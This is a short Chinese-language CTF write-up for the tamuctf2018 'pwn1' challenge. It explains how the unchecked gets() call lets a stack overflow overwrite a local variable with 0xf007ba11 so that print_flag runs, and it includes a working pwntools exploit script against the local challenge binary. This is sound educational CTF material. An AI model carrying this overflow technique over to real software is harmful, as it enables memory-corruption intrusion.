tamuctf2018_pwn1

思路

  • 先使用ida,觀察主函數(shù),看到gets函數(shù),要是不清楚可以使用man搜索一下,該函數(shù)是讀取一行的輸入,不檢查輸入的長(zhǎng)度,回車結(jié)束,因此該函數(shù)十分危險(xiǎn),也因此我們可知由此來溢出。
gets函數(shù).png

  • 同時(shí)我們可以看到有明顯的print_flag函數(shù),因此目的是滿足田間運(yùn)行print_flag,因此總體思路就是通過gets函數(shù),溢出,使v5被覆蓋,從而滿足判斷條件


    溢出點(diǎn).png

代碼

from pwn import*

context.log_level='debug'

io = process('./pwn1')

payload = '\x90'* 0x17
payload += p32(0xf007ba11)


io.recvuntil('What is my secret?\n')
io.send(payload)
io.interactive()
io.close()
運(yùn)行成功.png
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • ×00 0CTF 『第一屆0ops信息安全技術(shù)挑戰(zhàn)賽,即0ops Capture The Flag,以下簡(jiǎn)稱0CT...
    tmdsb38閱讀 3,035評(píng)論 0 4
  • ##**要求** 1. *人齊* 2. *時(shí)間不能太長(zhǎng)* ##**內(nèi)容** -做了什么 -計(jì)劃做什么 -未完成任務(wù)...
    Yimmy_26cb閱讀 162評(píng)論 0 0
  • 日精進(jìn)461天 體驗(yàn)入: 飯要一口一口的吃才會(huì)香,對(duì)胃也很好!一轉(zhuǎn)身想把華鄰美超市的銷售業(yè)績(jī)做的再高一些易是如此!...
    宇宙之愛黃昊貴閱讀 259評(píng)論 0 1
  • 自從父親回來住的這一陣子,他每天都起的很早,五點(diǎn)多就起床,而我們還在夢(mèng)鄉(xiāng)中。都說起早,是一個(gè)人年老的標(biāo)志??粗赣H...
    薄荷糖花閱讀 523評(píng)論 0 0
  • 上周五,一根陰包陽的放量大跌讓眾多投資者恐慌,而我卻結(jié)合持倉的股票進(jìn)行了加倉操作,并通過分析明顯表示今天的...
    默行者金閱讀 674評(píng)論 0 3

友情鏈接更多精彩內(nèi)容